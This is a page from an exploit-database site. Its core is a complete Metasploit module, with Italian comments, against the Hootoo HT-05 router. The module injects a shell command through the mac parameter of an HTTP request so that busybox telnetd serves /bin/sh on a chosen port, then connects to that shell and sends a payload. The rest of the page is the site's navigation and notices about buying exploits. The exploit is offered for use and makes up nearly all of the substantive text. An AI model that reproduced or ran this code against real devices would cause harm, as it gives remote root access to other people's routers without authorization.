0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Hootoo HT-05 - Remote Code Execution Exploit
[require 'msf/core'
require 'net/http'
require "uri"
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
#
#Descrizione del Exploit
#
def initialize(info = {})
super(update_info(info,
'Name' => 'Hootoo HT-05 remote shell exploit',
'Description' => %q{
This module tries to open a door in the device by exploiting the RemoteCodeExecution by creating a backdoor inside the device
This exploit was written by Andrei Manole. Version of the frimware 2.000.022. Tested on 2.00.0.82 -> it still works
},
'Author' => 'Andrei Manole',
'References' =>
[
],
'Privileged' => true,
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 2000,
'BadChars' => '',
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
}, #fine del settaggio del payload
'Targets' =>
[
[ 'Automatic', { } ],
],
'DisclosureDate' => "20 Dicembre 2018",
'DefaultTarget' => 0))
register_options([ Opt::RPORT(6666) ], self.class)
end
def send_request(host,port) #funzione di invio
uri = URI.parse("http://#{host}/protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|/bin/busybox%20telnetd%20-l/bin/sh%20-p#{port}")
http = Net::HTTP.new(uri.host, uri.port)
request = Net::HTTP::Get.new(uri.request_uri)
response = http.request(request)
if response.code == 200 || response.message == 'OK' || response.class.name == 'HTTPOK' then
return true
end
return false
end
def exploit #exploit
print_status("[+] Apertura backdoor in corso...")
if !send_request(datastore['RHOST'],datastore['RPORT']) then #controllo della funzione di invio , passando i dati scelti dal utenti mediante il datastore[] di msf.
raise("[-] Errore nel apertura della porta")
end
print_good("[+] Richiesta inviata con successo! :)")
nsock = self.connect(false, {"RPORT" => datastore['RPORT']}) rescue nil #inizio a fare la conessione
print_good("[+] Porta aperta con successo ! :)")
nsock.put(payload.encoded + " >/dev/null 2>&1") #passo il payload per creare una communicazione con la /bin/sh create sulla porta, ">/dev/null 2>&1" invio Stand Error in un backhole e dopo su 1 -> Standard Out.
handler(nsock)
return
end
end
Sent with [ProtonMail](https://protonmail.com) Secure Email.
# 0day.today [2024-11-15] #